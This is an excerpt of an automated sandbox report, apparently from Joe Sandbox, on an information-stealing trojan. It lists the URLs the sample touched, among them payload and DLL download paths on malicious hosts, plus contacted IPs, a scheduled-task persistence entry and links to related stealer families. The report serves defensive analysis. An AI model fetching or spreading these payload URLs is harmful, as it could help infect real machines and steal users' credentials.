                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://whispedwoodmoodsksl.shop/H5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://t.me/copterwinr0isMozilla/5.0katDDA4.tmp, 0000000C.00000002.2532896243.0000000000422000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12/freebl3.dllBukatDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6lJKEBFB.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.rootca1.amazontrust.com0:5876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.katDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.ecosia.org/newtab/5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://37.27.34.12/vcruntime140.dllykatDDA4.tmp, 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://lv.queniujq.cnkatDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.youtube.com/katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://whispedwoodmoodsksl.shop/n5876.exe, 00000007.00000002.2152415430.00000000007C9000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://www.google.com/recaptcha/katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://checkout.steampowered.com/katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgkatDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-darkexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://help.steampowered.com/en/katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://java.coexplorer.exe, 00000002.00000000.1406666637.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.microexplorer.exe, 00000002.00000000.1402569420.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1402546303.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1400425752.0000000002C80000.00000002.00000001.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://recaptcha.net/recaptcha/;katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menukatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://broadcast.st.dl.eccdnx.comkatDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://x1.c.lencr.org/05876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://x1.i.lencr.org/05876.exe, 00000007.00000003.1773283260.0000000002C86000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://37.27.34.12/freebl3.dll0ukatDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2272992305.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369392063.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2398137351.00000000009DF000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2374708163.00000000009DF000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/workshop/katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://login.steampowered.com/katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://steamcommunity.com/profiles/76561199689717899/badgeskatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://support.mozilla.org/products/firefoxgro.all5876.exe, 00000007.00000003.1774602744.0000000002D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/legal/katDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://37.27.34.12/softokn3.dllX:/katDDA4.tmp, 0000000C.00000003.2398637104.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2369744070.00000000009C3000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2114692645.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2129661356.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2144632677.0000000000992000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2099605287.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico5876.exe, 00000007.00000003.1743881764.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2236009021.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, GHDBAF.12.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12KEBFIEkatDDA4.tmp, 0000000C.00000002.2532896243.000000000052E000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://37.27.34.12/msvcp140.dllykatDDA4.tmp, 0000000C.00000002.2536713004.0000000000988000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://rpi.net.au/~ajohnson/resourcehackerEE6.exe, 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000000.2053146567.00000000004B4000.00000002.00000001.01000000.00000008.sdmp, katDDA4.tmp.11.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://ns.adobeSexplorer.exe, 00000002.00000000.1401095167.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://127.0.0.1:27060katDDA4.tmp, 0000000C.00000003.2069461479.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://steamcommunity.com/login/home/?gokatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?vkatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgkatDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=englikatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://api.steampowered.com/katDDA4.tmp, 0000000C.00000003.2068424955.0000000000963000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&ctakatDDA4.tmp, 0000000C.00000002.2536713004.00000000009D7000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2536713004.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, HIJJEG.12.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://store.steampowered.com/mobilekatDDA4.tmp, 0000000C.00000002.2532896243.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2085052151.0000000000991000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2069461479.0000000000956000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.12.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.msn.com:443/en-us/feedexplorer.exe, 00000002.00000000.1401695324.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    23.145.40.124
                    		unknownReserved
                    		22631SURFAIRWIRELESS-IN-01UStrue
                    190.147.128.172
                    		unknownColombia
                    		10620TelmexColombiaSACOtrue
                    109.175.29.39
                    		unknownBosnia and Herzegowina
                    		9146BIHNETBIHNETAutonomusSystemBAtrue
                    104.102.42.29
                    		steamcommunity.comUnited States
                    		16625AKAMAI-ASUStrue
                    37.27.34.12
                    		unknownIran (ISLAMIC Republic Of)
                    		39232UNINETAZfalse
                    190.13.174.94
                    		dbfhns.inChile
                    		14117TelefonicadelSurSACLtrue
                    188.114.96.3
                    		whispedwoodmoodsksl.shopEuropean Union
                    		13335CLOUDFLARENETUStrue
                    185.235.137.54
                    		unknownIran (ISLAMIC Republic Of)
                    		202391AFRARASAIRfalse
                    91.202.233.231
                    		unknownRussian Federation
                    		9009M247GBtrue
                    45.129.96.86
                    		unknownEstonia
                    		208440GMHOST-EEtrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1448044
                    Start date and time:2024-05-27 15:22:07 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 12m 30s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:xvJv1BpknZ.exe
                    renamed because original name is a hash value
                    Original Sample Name:c5261e67bd6d58771e27d7214e8f1c8f.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@14/36@11/10
                    EGA Information:
                    • Successful, ratio: 80%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 71
                    • Number of non-executed functions: 240
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 13.89.179.12
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target katDDA4.tmp, PID 7360 because there are no executed function
                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report creation exceeded maximum time and may have missing disassembly code information.
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtEnumerateKey calls found.
                    • Report size getting too big, too many NtOpenKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    09:23:18API Interceptor393338x Sleep call for process: explorer.exe modified
                    09:23:36API Interceptor8x Sleep call for process: 5876.exe modified
                    09:24:17API Interceptor1x Sleep call for process: katDDA4.tmp modified
                    09:24:18API Interceptor1x Sleep call for process: WerFault.exe modified
                    15:23:23Task SchedulerRun new task: Firefox Default Browser Agent F42826001ED76615 path: C:\Users\user\AppData\Roaming\etrtabd

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    23.145.40.124PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    3.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 23.145.40.124/pintxi1lv.exe
                    109.175.29.39file.exeGet hashmaliciousBabuk, Djvu, PrivateLoaderBrowse
                    • cajgtus.com/lancer/get.php?pid=903E7F261711F85395E5CEFBF4173C54
                    SecuriteInfo.com.Win32.RansomX-gen.4067.126.exeGet hashmaliciousLummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, RedLine, SmokeLoaderBrowse
                    • trmpc.com/check/index.php
                    7vMi37TpMO.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                    • kamsmad.com/tmp/index.php
